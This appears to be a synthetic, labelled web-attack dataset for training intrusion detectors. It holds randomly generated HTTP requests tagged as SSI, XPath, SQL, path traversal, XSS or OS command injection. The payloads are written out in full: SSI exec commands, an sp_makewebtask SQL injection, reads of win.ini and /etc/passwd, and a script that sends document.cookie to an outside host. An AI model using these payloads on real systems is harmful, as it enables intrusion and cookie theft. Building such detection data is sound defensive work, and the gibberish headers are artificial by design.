Accept-Charset: x-mac-greek;q=0.4, isiri-3342;q=0.8, x-mac-cyrillic;q=0.5, x-mac-roman, windows-1255;q=0.7
Accept-Encoding: 
Accept-Language: ../../../usr/dsqqdsqsd.xml
Cache-Control: abtdtoh='lt'
Client-ip: 223.244.181.80
Cookie: y23rOzqdi=nbwoRTRc7Pse;3oaaEnrwran9gy=58;GupdatefN0-TOBe=93
Cookie2: $Version="04"
Date: Sun, 05 Nov 06 04:00:13 CET
ETag: "dpXSh8Z-yIwmS16F7"
Expect: rz4nngt=9nmgu;Xsnsdc
From: sene@eakbEa.biz
If-Modified-Since: Fri, 01 Feb 08 13:10:09 UTC
If-Unmodified-Since: Mon, 08 May 06 01:58:23 CET
If-Match: *
If-None-Match: "uxNBcAY0sXQKRTJskWn"
If-Range: Sat, 16 Oct 04 17:28:25 GMT
Max-Forwards: 4
MIME-Version: 5.9
Pragma: ypueboh='niiO3i'
Proxy-Authorization: Digest qop=2nwtea
Authorization: ic3inc 7rHTg=Iearh
Range: -91317,1-,143349-680394
Referer: http://www.fhaszoo.ch/moGqrTet/weQwal.swf
TE: trailers,trailers
Trailer: Trailer
User-Agent: trna1copangiEl
UA-CPU: 68000
UA-Disp: 268,3394,32
UA-OS: Solaris
UA-Color: color32
Via: 5.0 160.165.106.9, 6.1 www.ri0ssM.tiff, 5.8 www.e4sdoTmu.gif
Transfer-Encoding: compress
Upgrade: li4Qh/6.8
X-Serial-Number: 1695906696796277181
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 44643
Start - Id: 40266
class: SSI
GET /er0E/Bc6FhttpXgA/eH@tFhKk2w9AeeMF/eefcmzQalemnsrshn/4pL/phpT4wget0T5VaQ/ndSeooleoirlEetsrxr.mdb?0ooennabnon8t0=ng10csescriptn&ali=iRi8divsonull%3Ersxroytr&xii7pceibr=%3C%21--++%23exec+++cmd%3D%22c%3A%5Cprogra%7E1%5COgtnjgrSt1%5Cegl%5CfbaHa.exe++++d%3A%5CKnB%5Cwww.ntsemaanil.org%5CfamtNn%5Cdatabase.mdb++++%2Fx+exporttofoxpro%22--%3E&nui=eo&ukuezai=5622&bdoraoFT=0&hnttrrA=oazbwaraW&edr=si&eye=2tinth2tiiescnk&WSStvareWTmR=037097288&Rnull-4t=2469909&noorgk=4&imrykbse=108962&NH0elltnc3ttk=iylikeuBpmail HTTP/1.1
Host: www.emtnakni.net:80
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: max-age=7857
Client-ip: 140.72.125.191
Cookie: vupasja3ema8=slmE;TUxr4N9union=3998296;hrv3sf5oo=0390;trtiearI1gau=7;1nh8e=oN8'cydi;irdBWeMry7=11
Cookie2: $Version="14"
Date: Wed, 07 Jul 04 17:33:46 CET
ETag: W/"B6wSrN4YjC3rpPVq"
Expect: 100-continue
From: egziMn7g@s6edmgn.st
If-Modified-Since: Mon, 28 Feb 05 21:54:39 CET
If-Unmodified-Since: Thu, 21 Jun 07 10:39:49 CET
If-Match: "rSCGOwXFNPvP-sEum"
If-None-Match: "al9Ci8aqrUkjFeBH"
If-Range: "atnOO.VOMeoQPML2"
Max-Forwards: 9
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: Digest uri=/A2lAseE/fmtkprd/sito/xrIox8.avi
Authorization: Basic Z1RvaWRtczY6b3NsZQ==
Range: -72,34-,551452-70
Referer: http://www.naAsha.ch/eyns/oooh.php
TE: trailers
Trailer: Authorization
User-Agent: Mozilla/8.9 (compatible; Konqueror/4.1; Win98; eEdyshat)
UA-CPU: MIPS
UA-OS: Win95
Via: 4.0 78.1.79.106, 3.1 www.eii5.tiff, 8.0 53.41.88.103
Transfer-Encoding: rapc52
Upgrade: zebo/3.9
Warning: 487 www.1qtdgidu.tiff "h7idno2aalutGrerznAt" "Sun, 05 Mar 06 10:34:02 UTC"
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40266
Start - Id: 49432
class: XPathInjection
GET /R0Zu1B2servicesj/YNPjQYpJmr.3/nCxOdyT@YzdSt_aA/5Rms8A5Q/sSinTbKCWwCa7pfFdL/w8JdocumentJ@5Ft/e85PogulD8UwVTOFLMUt/yrOJq.FNp.aspx?fs8qdlaIjynt5=tne&cUrlfyiv3U=gtzhbel&rspi3siog=uiftjdi%27sese+s&7Hy3xmhodil=cvSGIj_hf&oo0s0id0wmmeeu=qcNEthr&jQAwCu=%28i+++++%3C+++++count%28dcibsn%2Fchild%3A%3Atext%28%29%29+and++j+++++%3C+count%28Mlcnsx%2Fchild%3A%3Acomment%28%29%29+and++++k++%3C++count%28ai%2Fchild%3A%3A*%29++++%29&hywhO5=o%24sock_stream&estrnepTasZa=imedpnEduc HTTP/1.0
Host: www.rseg.st
Connection: otptgrl
Accept: image/gif, application/postscript, application/*;q=0.8
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.2
Cache-Control: max-stale
Client-ip: 64.61.159.147
Cookie: eelo=187588325;etZ3v=a4sb_9;oX1NZja60dkF=1915;etrh=lxK4HWs@;axevh=46012669
Cookie2: $Version="6"
Date: Wed, 25 Mar 09 21:43:43 UTC
ETag: "6KlxO_9ouuEMb1v4Ilw"
Expect: eYoeeGr=eejts
From: poiter@eorm.biz
If-Modified-Since: Tue, 08 Sep 09 23:53:49 GMT
If-Unmodified-Since: Sat, 24 Oct 09 03:43:30 CET
If-Match: "KcPEIEblBQ-CmKz_cXNo"
If-None-Match: *
If-Range: Sat, 10 Dec 05 22:53:27 UTC
Max-Forwards: 1
MIME-Version: 3.8
Pragma: rp='aa8d'
Proxy-Authorization: Basic dHR0clJ5dTY6Zm9kamM3Yg==
Authorization: Basic YXc0b3lobjplZGFhZ2M=
Range: -32,-92418
Referer: http://www.fq6embaw.uk/2rhlns/stls/dqece.mspx
TE: chunked,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/8.8 (Machintosh; U; Mac OS X 6.3; ca-4r; rv:4.6.3) Gecko/49551987
UA-CPU: StrongARM
UA-Disp: 247,139,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 5208x110
Via: aYsnt/6.2 www.eto7.tiff, HTTP/4.9 www.0oteOpIe.js, 2.6 26.178.55.229:3
Transfer-Encoding: ofet; oyloye=ti7qs1
Upgrade: e0oOd/9.2, ouh2i/3.3, Ncur/2.5
Warning: 168 www.mBsttTo.jpg "zsvb" "Fri, 02 Nov 07 10:06:41 UTC"
X-Forwarded-For: 43.207.47.88
X-Serial-Number: 812184590933752195
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49432
Start - Id: 48652
class: XPathInjection
PUT /opZN/seeR/2ptGGq@ZcKbJ/ajXNs3-LdivU0/jKtZQG/uOGENdeN/tlawHTK.html? HTTP/1.0
Content-Length: 177
Content-Language: oT,h,ggAe
Content-Encoding: deflate
Content-Location: /fsGee.exe
Content-MD5: ZXR0bmRlb2Jzb3RsMHNmUw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 02 Sep 09 09:03:32 GMT
Last-Modified: Sun, 12 Dec 04 16:00:11 CET
Host: 175.249.10.163
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1257;q=0.4, windows-1251, cp-936, iso-8859-5
Accept-Encoding: identity, identity, compress, identity;q=0.1, deflate;q=0.4
Accept-Language: oNdolln-MP
Cache-Control: min-fresh=2
Client-ip: 188.140.113.72
Cookie: YXHM5G-hNdSq=36;f0elastoanna8=86594;eUphv0nDd=I'r7]eotj6uw;seRyrta7po=ejiyi;srt0oxou4tst=935
Cookie2: $Version="57"
Date: Tue, 23 Mar 04 12:09:22 UTC
ETag: "bQtfcZLDIz1no2ICu5"
Expect: 100-continue
From: eta3@rewxn.biz
If-Modified-Since: Tue, 27 Apr 10 22:12:08 UTC
If-Unmodified-Since: Thu, 25 Jun 09 05:27:38 GMT
If-Match: "khpo7Gi5AlpzPwYH"
If-None-Match: "fA8cmb.zXWJITyEO-nKi"
If-Range: Sun, 05 Apr 09 10:23:32 GMT
Max-Forwards: 202
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: NTLM cXRhYXRucm5EaTR0cGR2b2ZubGZlYXR5c3Vob3R0ZWlzZVJvbHMydA==
Authorization: Digest nc=FF568b5A
Range: -046912,8351-4,007308-22
Referer: /enji/tyehotg/2De8ri/fmheae.aspx
TE: trailers,deflate,gzip
Trailer: If-Unmodified-Since
User-Agent: Mozilla/9.5 (X11; U; Solaris 2.7; wr-hn; rv:5.6.9) Gecko/96710433
UA-CPU: x86
UA-Disp: 445,3522,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 090x151
Via: 6.3 www.idoe6.jpg, HTTP/2.1 83.166.180.82
Transfer-Encoding: gzip
Upgrade: Bkmi/2.1, eLo/9.3
Warning: 958 171.58.48.221:65022 "tbsyeeovlI4la7he" 
X-Forwarded-For: 134.235.97.118
X-Serial-Number: 2534410035139389
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

N8eeumieloOho=neqwBdODRat&h5=388213&kivuedahfb8cn=r2pema'  or     6 <  count(path/child::*)  or 'upoqiC'    =    '&ylbdernS=aorts6optlmocha/exe htpass1we

End - Id: 48652
Start - Id: 39454
class: SSI
GET /rtrossheljumeOosE/69oRq80Ka5uG4umV2j/shhsprhzIsef/2JGPgkcD/yNeboot.iniU9R@_Gnzhome/64jdocumentsystemflz/hFuRTpD9SitHj/atARP/iedmdsbRnlf2/tOPvF-wXX.C8/iMDBl0o6C2DAT6TVKrI/l5SF.JUgkJLSG.sh?ehmih=7oyLr&mTil=hatpnetcat&6otscmfsdt=4&e4yfoi=662534&medryrcr9=14043609&nn=jtnrtzebebo23sU2ol&tD=%3C%21--%23email+fromhost%3D%22www.taf62seb.com%22+tohost%3D%22mailbox.keop.com%22+message%3D%22tsee+zhtarn+dfli+u745nt%22+fromaddress%3D%22ahtn.com%22+toaddress%3D%22ne7hL.ogmmhy.com%22+subject%3D%22swh%22+sender%3D%22ht1.com%22+replyto%3D%22bceLafa.com%22+cc%3D%22yh%22+inreplyto%3D%22rms+s5u6+rnetE%22+id%3D%22nreoomail%22+--%3E&tkiztgnilkT=NsCyrgoLHar HTTP/1.1
Host: www.oettechn6.de:90
Connection: keep-alive
Accept: audio/*, application/x-tar
Accept-Charset: *
Accept-Encoding: 
Accept-Language: aes-n, eeitgn-sTh01H;q=0.0
Cache-Control: no-cache
Client-ip: 179.178.240.191
Cookie: RW5@V@DxY=aech
Cookie2: $Version="52"
Date: Mon, 21 Aug 06 09:36:07 UTC
ETag: W/"OsLV-aEWwosxLq8"
Expect: 100-continue
From: antap@dxtrNr.uk
If-Modified-Since: Sat, 10 Dec 05 02:03:36 GMT
If-Unmodified-Since: Fri, 12 Aug 05 19:01:22 UTC
If-Match: *
If-None-Match: "JWlT5x3vHYCnrL-BBY"
If-Range: *
Max-Forwards: 9417
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: Basic NHN2YUI6a290bnNw
Authorization: NTLM dGVhbmloTHJvZWZpbjNlb1RlZGZvM2lhcmExdGZ0c2ExRXJuc2NoM3Ji
Range: 993-
Referer: http://www.eaQnm.com/nnneUdmh.cgi
TE: trailers,trailers
Trailer: Warning
User-Agent: eZnDUQ http://www.saeXt.uk
UA-CPU: 68000
UA-Disp: 677,8714,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 859x7784
Via: srH3tn/7.4 160.214.66.136
Transfer-Encoding: dOape
Upgrade: nSr/8.2, bkiiH/4.4, thru4/6.0
Warning: 440 94.219.210.210 "VoDndsgoidctiTr" 
X-Forwarded-For: 109.38.196.61
X-Serial-Number: 7068368888972542
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39454
Start - Id: 40327
class: SSI
GET /aot/uXQjR_/cqqZ00jzNup7ifH-paaF/sCtl/phpuh/tsLaeestTItno8rehot/tf_PkUkk2XvGflUP3q/hTrpinsert/b2nBLXubetweenX/la/hNoPQQ_/uQ8Ntftpv.html?qmeta0.inputN=mailale&scsdars3k=ltmHM&hmtdt4ynud=s%24a8%5Bswinevqft%3AN+Sa&snh1=ld21unfrd8&efrTt=dnsQ&digb9phtrTrniox=2668636&cn=1othdpsEntghw5sye&nbT4TSpiGii7m=a_lR7S&k3JTcIJqkTobjectZ=5ncfA%27nob%5Bh2&dtheeI=sidmd&eiUrt5glrnM=5327594&nisr=92834&m4y=efperls%3E&xbgsoundoUZU6mZ=%3C%21--%23exec++cmd%3D%22c%3A%5Cprogra%7E1%5CiolsHylam%5CiD%5CeRwya.exe++++d%3A%5Cylgeene2Np%5Cwww.altr.org%5Cth%5Cdatabase.mdb++%2Fx++++exporttofoxpro%22--%3E HTTP/1.1
Host: www.idst.uk:80
Connection: keep-alive
Accept: video/*;q=0.6, image/*, text/*
Accept-Charset: *;q=0.1
Accept-Encoding: identity, identity, compress;q=0.1, gzip, compress
Accept-Language: *
Cache-Control: no-transform
Client-ip: 217.69.24.80
Cookie: rcSdiA0lq=(n?rraeSte;rmhomeY2Ph5VhavingCR=42832;lypiu=rY86x5
Cookie2: $Version="171"
Date: Sun, 29 Aug 04 05:51:42 UTC
ETag: "32_@SBUduCwDYWRv4fKP"
Expect: 100-continue
From: hTihs@4oAMasocxd.biz
If-Modified-Since: Fri, 25 Jan 08 23:31:17 UTC
If-Unmodified-Since: Thu, 10 Feb 05 05:28:10 GMT
If-Match: *
If-None-Match: *
If-Range: "uEH-ZYdFlT4d-sgDc"
Max-Forwards: 42
MIME-Version: 0.0
Pragma: lyl='blecipf'
Proxy-Authorization: intehp 4edI=sr6n1ysd
Authorization: Basic YWVlZDpBZG53
Range: -2115,0045-233,-51
Referer: /tDe0gui/eheaod/dlialelr.nsf
TE: trailers,gzip;q=0.2
Trailer: If-None-Match
User-Agent: Mozilla/9.7 (Windows; U; Win98 7.3; ne-se; rv:2.6.4) Gecko/30354768
UA-CPU: MIPS
UA-Disp: 996,846,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 8587x911
Via: 9.5 www.amWanad.html, 2.0 31.197.128.187:7, eNtc/4.0 www.jthliiEh.htm
Transfer-Encoding: deflate
Upgrade: aTEi/5.9
Warning: 196 2.26.22.3:993 "ye78torehxsveoUeewSd" 
X-Forwarded-For: 114.213.56.41
X-Serial-Number: 475557970524
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 40327
Start - Id: 40986
class: SqlInjection
GET /XMtmpz-SbUEZVGperl/rPs/pK7S58nsoe4eRNMmhpWZ/jRA.-vjC8j3BC6rn/aneeAe/a13d4f66gEeO8I/mce/tleseDl/eaphqMF-/aveakA/AWh/ajikkceI.js?vVF5u=t1xdx9M&itueueCweo=6716192&osluiczsse=216863 HTTP/1.1
Host: www.hr8die.st
Connection: yr4R
Accept: application/*, text/html;q=0.6
Accept-Charset: x-mac-hebrew;q=0.5, x-mac-greek;q=0.8
Accept-Encoding: 
Accept-Language: ia-e5jru;q=0.5
Cache-Control: uOddEhc=j
Client-ip: 72.36.50.94
Cookie: euipt7dd=823;imhHLOionsr=tiauN;rdi3=0224857;wretot=eeos/tjOs;h1besti3aksa='; EXEC    master.dbo.sp_makewebtask   'c:\inetpub\wwwroot\i5GE.png',     'SELECT   heheh  FROM     rcn  WHERE   xtype=''U''';amnucnt=407
Cookie2: $Version="11"
Date: Sat, 29 Aug 09 23:03:56 GMT
ETag: W/"-ug5NWVnwdO6MSNr"
From: 0nhkngwk@nPuAseshox.org
If-Match: *
If-None-Match: "FZvavhJoOipm9l0G"
If-Range: Thu, 29 Oct 09 12:00:06 GMT
Max-Forwards: 338
Pragma: idalT=eqtrE
Authorization: Digest opaque="Ndnm"
Referer: http://www.6wo0l.biz/Rto8TfCA/sloqy0.cgi
TE: chunked;q=0.4,trailers,gzip
User-Agent: t3b6C/5.4.3.4.0
UA-CPU: x86
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40986
Start - Id: 36149
class: PathTransversal
GET /openggdocument4Ac9xmlRDt6Y/PHhomeSqhavingnetcat8WETMDCmeta/jrsoprpgskagalcclm/0s/woire8obt/novvusr/ljCv1VEr7wh@zb/i_jPMiG9IV2ww/escnT1lei1/ire17e/i-anPn-6b5f8j8Z.htm?acojgs=e%3A%5C%5CWINNT%5C%5Cwin.ini&hPigenseE=31&mONd.7A3oCl0a=jDBSWL&1IiJUI=itCeut%3Dtr4e&k5qD=8&uddonoq0=609&amot=pnh HTTP/1.0
Host: 183.68.206.129
Connection: tteijZ
Accept: application/*;q=0.1
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: tnteWh-9cfsU, aoat5niq-Ueec;q=0.4
Cache-Control: no-store
Client-ip: 52.138.136.254
Cookie: asu8utIo=13
Cookie2: $Version="9"
Date: Sun, 20 Sep 09 04:59:22 UTC
ETag: W/"ns9fmDOQwg1@j3lH"
Expect: etoihr
From: aitunw@tegatgpn.uk
If-Modified-Since: Mon, 24 Jan 05 21:29:25 CET
If-Unmodified-Since: Sun, 26 Dec 04 09:23:09 UTC
If-Match: "VcIuyd-IlaxkYrScP"
If-None-Match: "K43o6XIECWMNYSC"
If-Range: *
Max-Forwards: 3336
MIME-Version: 8.6
Pragma: uaid3=inumsrod
Proxy-Authorization: NTLM aWVhbTh3ZWFleGRmaGd0cm5VMHN0ZXh2M2lnb05qdGVoZWhzdQ==
Authorization: NTLM bWNoOHN4ZWh1bElpZWRrcmVsTWN0d2hpb2FiYXJldG92dWV1bnVvaQ==
Range: 375-
Referer: http://www.sbgm.net/oA7db4ha/wfee2wor/Mes3erhe.jsp
TE: trailers,trailers
Trailer: Connection
User-Agent: Mozilla/6.0 (X11; U; SunOS sun4u 4.4; lt-ae; rv:6.9.3) Gecko/35034229
UA-CPU: MIPS
UA-Disp: 4342,924,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9880x9117
Via: zwgt/5.7 18.79.7.7, eels/1.1 www.lptn5qe.js
Transfer-Encoding: compress
Upgrade: bhte/9.7, rertro/9.5
Warning: 851 141.46.27.130 "hnaniEfhYuniiebi" 
X-Forwarded-For: 27.217.111.45
X-Serial-Number: 6486734154619358
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36149
Start - Id: 48514
class: XPathInjection
PUT /cSnyehsncrOtnIaAapm.asp? HTTP/1.0
Content-Length: 316
Content-Language: oMrsk,meHJ
Content-Encoding: gzip
Content-Location: /aaxa.ace
Content-MD5: TWF5bmlhY29sQWxuZmg5bg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 03 May 10 21:08:21 UTC
Last-Modified: Sat, 27 Feb 10 05:37:09 GMT
Host: 134.18.119.141
Connection: oIno
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: max-age=80452
Client-ip: 249.107.208.202
Cookie: ouds1=eee<;hocyitkhs=2085
Cookie2: $Version="2"
Date: Sat, 12 Dec 09 02:41:28 CET
ETag: W/"Z8k6MID8rdOhM91kgfF"
Expect: pdaiytge=ttintxkT;rkEAm
From: ndy1yIc@htecd7n.uk
If-Modified-Since: Fri, 01 Jun 07 16:14:51 GMT
If-Unmodified-Since: Tue, 22 Feb 05 22:54:44 GMT
If-Match: *
If-None-Match: "nF.LSAMBYm1djvYQn5Z"
If-Range: Mon, 04 Sep 06 11:26:15 CET
Max-Forwards: 244
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: Basic ZXNycGVkOmNxbU8=
Authorization: dLedL1 9at7e=pu3pp5
Range: 811682-312,0-
Referer: http://icatel.it/aatreKl/cn1ohEie/ieenpoei/ptHr/kwgh.exe
TE: gzip;q=0.2,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/4.6 (Machintosh; U; Mac OS X 9.0; e4-na; rv:3.0.1) Gecko/21732632
UA-CPU: 68000
UA-OS: Solaris
UA-Pixels: 951x0046
Via: 4.4 41.93.20.75, 7.2 223.227.82.179
Transfer-Encoding: deflate
X-Forwarded-For: 104.189.251.216
X-Serial-Number: 7572286452988
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

CW=nst'    or   (i   <     count(aysem/child::text())  and  j <  count(Shndn/child::comment()) and k <    count(1d/child::*)    )     or 'ec'   =   ' hfe1'   or&EX73e=s liphs&nt8alng=60&tat=Esp;n <exectoa5v;2$?oh&nco3P00aR=]sln&otyhigeSit=iw7wp

End - Id: 48514
Start - Id: 46727
class: XSS
GET /pehnsPec/h5ev1/roPPpf/dCnnE2tnssri/TK/rezo/zajxSb/R8d7rzeiXnb/nf6FI/HRcAa2HcobjectDuU.dZ/nxig2ardeodmixul.msf?7ao7=ejEthmmL&Rc55_=80903&TX9eAtc5aesd=lKiGnC69n&hoHt8HBqand=%28t%3AzTpasswdhf&exoyaa=j%3Dm HTTP/1.0
Host: 203.19.224.74
Connection: zhrreIse
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: 1eaicwar-eti;q=0.4
Cache-Control: no-store
Client-ip: 91.101.32.104
Cookie: ssenhecjhcea=ia2ct;esErasletmrgog=&<script  >[document.location.replace ('http://www.atteal.com/cgi-bin/matite.cgi'+document.cookie);]</script   >;orin=tosenfr%tsesosiue)t2;kxJxYxox=Oein94;o9cb7umas=iOTLTde;sqtsnoqowM2G=rat-_t0mEsrm
Cookie2: $Version="6"
Date: Wed, 20 Apr 05 01:12:03 GMT
ETag: "yCU6lB0dTv41IMWuqIc8"
Expect: 100-continue
From: mxoee2@lBEae77d.it
If-Modified-Since: Mon, 03 Jul 06 05:58:44 UTC
If-Unmodified-Since: Sat, 07 Jan 06 06:33:40 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 08 Sep 06 08:07:04 CET
Max-Forwards: 2
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: yaje qine=rs3s
Authorization: Digest qop=mshbazh
Range: 33-010
Referer: http://www.bfmetItv.gov/ioldrxr/motlue/aahlmeA/a1hd.cgi
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/8.3 (Windows; U; Win98 4.2; ef-hO; rv:1.0.9) Gecko/67261599
UA-CPU: 68000
UA-Disp: 257,623,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 0307x779
Via: FTP/2.5 144.151.25.239:37
Transfer-Encoding: gzip
Upgrade: ar7fy/8.9, amv/7.8
Warning: 482 www.rd3c.png "onQyhRm" 
X-Forwarded-For: 101.237.144.23
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 46727
Start - Id: 43082
class: OsCommanding
POST /HIUOU.asmx? HTTP/1.0
Content-Length: 175
Content-Language: wnbtyLw,srl,ncsiEao
Content-Encoding: compress
Content-Location: /pcu2/fof4i/nszsP3nl/nhetlm.mspx
Content-MD5: aGl0c2pld2ltcGlNaWVlYg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 16 Apr 09 18:04:21 UTC
Last-Modified: Wed, 28 Jan 09 17:47:41 GMT
Host: 180.237.66.245:79
Connection: close
Accept: application/*, audio/*, application/x-tar
Accept-Charset: *;q=0.5
Accept-Encoding: compress, gzip
Accept-Language: *
Cache-Control: max-stale
Client-ip: 56.53.104.65
Cookie: .c_CB=1905804123;enfnv9t7est=024809;tx3q=rcpen;rbteainninmt=956920;edo=iVrwBg4.bV;fue8=enw4T9te
Cookie2: $Version="36"
Date: Fri, 05 Nov 04 09:38:47 UTC
ETag: "FDUu-B@bbhg0TtN"
Expect: 100-continue
From: twrTzya@l1npan.ch
If-Modified-Since: Sun, 28 Dec 08 24:43:14 UTC
If-Unmodified-Since: Thu, 26 Apr 07 14:46:38 CET
If-None-Match: "CdoZIlMjF2UeQr0mgYGU"
If-Range: *
Max-Forwards: 8
Pragma: no-cache
Authorization: Digest uri=/reeir/i8ahohs/erfto7/bg3yv/Bo9csbt.mp3
Range: -57,-072,-891
Referer: /r6osb.nsf
Trailer: Pragma
User-Agent: utjwwiti/1.0.1.0.8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 9690x5155
Via: 7.3 168.28.175.37
Transfer-Encoding: ese2; btmlthc=sEMeohq
Warning: 478 www.atuy.css "969s" 
X-Forwarded-For: 228.11.44.229
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tm=|     cat  ../../../../../../../etc/passwd |&sio=390259259&r0nj1ttece=72&isncgB=5&iAmucgvaf=E 7w&tf4haairtuy29=5esw&iy=gogPeesrePeahe&3v0o66CmA=nhtacces

End - Id: 43082
Start - Id: 48198
class: XSS
POST /eworpeka5ebTgetbasjs/KC3qWhaving.gif? HTTP/1.0
Content-Length: 42
Content-Language: r,ln
Content-Encoding: gzip
Content-Location: /enetnr/wstcs/fnbis/tjr9/r5et.bin
Content-MD5: b2xhaGl0ZXBlYWU2aWdJaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 31 Jan 09 10:17:38 CET
Last-Modified: Thu, 11 Oct 07 05:45:39 UTC
Host: www.e6getpe.it
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: isiri-3342, windows-1251;q=0.6, iso-8859-8-i
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: max-stale=5
Client-ip: 198.54.180.201
Cookie: t8oeabdlejctt=-n;mltWtnj=)1|iymo\perlwsm|esa;8ces=wcuGV_cMjGz;hsoL=e\Aan
Cookie2: $Version="2"
Date: Sat, 10 Jul 04 17:46:59 GMT
ETag: W/"__Prerwr1jnojp8xn"
Expect: 100-continue
From: lcdwth@njitaNrh.com
If-Modified-Since: Sat, 08 Jan 05 02:47:38 CET
If-Unmodified-Since: Sat, 14 Apr 07 11:52:58 CET
If-Match: "_ZpeF5w8xIE665DPiS8"
If-None-Match: "FL9ZWBtc@qf-zR8"
If-Range: "EX0NzQs@bHgVAAdi"
Max-Forwards: 65
MIME-Version: 2.8
Pragma: 2aow='dktcu5rT'
Proxy-Authorization: Basic ZHI0bWU6YVRlbg==
Authorization: Digest nc=8A23f0B3
Referer: http://www.cnsg.uk/lvxw9geF.css
TE: chunked;q=0.9
Trailer: If-Match
User-Agent: <script  >alert  (saodh.ii5te)</script  >
UA-Disp: 9694,0941,32
UA-OS: FreeBSD
UA-Pixels: 9098x7703
Via: oesO9/8.0 168.114.250.243, 8.1 www.beEhsh5.js, 7.2 174.243.0.149
Transfer-Encoding: identity
Warning: 376 www.tr4on.jpeg "m7aaREuTTovptbolar" 
X-Forwarded-For: 251.96.98.120
X-Serial-Number: 340888141293
----: -------------

pSiPn=eU_rFbA@8&tepznpasiOsnril=soorYcge

End - Id: 48198
Start - Id: 36140
class: PathTransversal
GET /h0WlRpA-tiqblWsCAv/tesdes/1ist2N8l/pMCDut2MtJX5/p5oBpJdN_/6nmtyoezoav.bin?qlznieouasomls=2&QjyJ-OT0updateCW2=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&tenaUIp=5&fqknqoihhneode=trzmsPY4xz HTTP/1.0
Host: 132.124.240.125
Connection: keep-alive
Accept: video/*;q=0.2, image/*, application/*
Accept-Charset: euc-cn, utf-7;q=0.8, x-mac-greek, x-mac-japanese;q=0.3
Accept-Encoding: *
Accept-Language: Iya9r-a;q=0.9
Cache-Control: max-stale=06606
Client-ip: 25.79.74.161
Cookie: e8mecpe5oqth=m;obattdtw5r=faeh;pRdlt=nat;ta3n=81175052
Cookie2: $Version="1"
Date: Mon, 06 Apr 09 09:18:26 UTC
ETag: "1Th7ACFJdKWcpA5LuNZ"
Expect: 100-continue
From: Arat@rNst.com
If-Modified-Since: Tue, 22 Jan 08 12:50:20 UTC
If-Unmodified-Since: Tue, 08 Jun 04 13:18:11 UTC
If-Match: *
If-None-Match: "1@GKwCcl3LZPQvuE@l_"
If-Range: Sun, 21 May 06 10:21:42 CET
Max-Forwards: 9
MIME-Version: 1.7
Pragma: tmetu=Etciw
Proxy-Authorization: NTLM aWVhbTh3ZWFleGRmaGd0cm5VMHN0ZXh2M2lnb05qdGVoZWhzdQ==
Authorization: Digest qop=hiiaf
Range: -52194,2-,7-21979
Referer: http://theO5t.st/lqjo/ts5ueY/ltlf/srynidg/ga2wd.mdb
TE: trailers
Trailer: Accept-Encoding
User-Agent: oohpaEoewf (i1tGdO; e.-ppBN6; nhZcti; vmYA2l; r.X1ul)
UA-CPU: MIPS
UA-Disp: 4342,924,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 795x647
Via: 2.0 www.nhN8a5.tiff:42, 2.5 255.157.246.7
Transfer-Encoding: gzip
Upgrade: n1LC/2.0, d6dsi/4.8
Warning: 565 www.Stne8T.html "eAh6" "Thu, 04 Dec 08 18:59:50 UTC"
X-Forwarded-For: 27.217.111.45
X-Serial-Number: 6486734154619358
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36140
Start - Id: 48888
class: XPathInjection
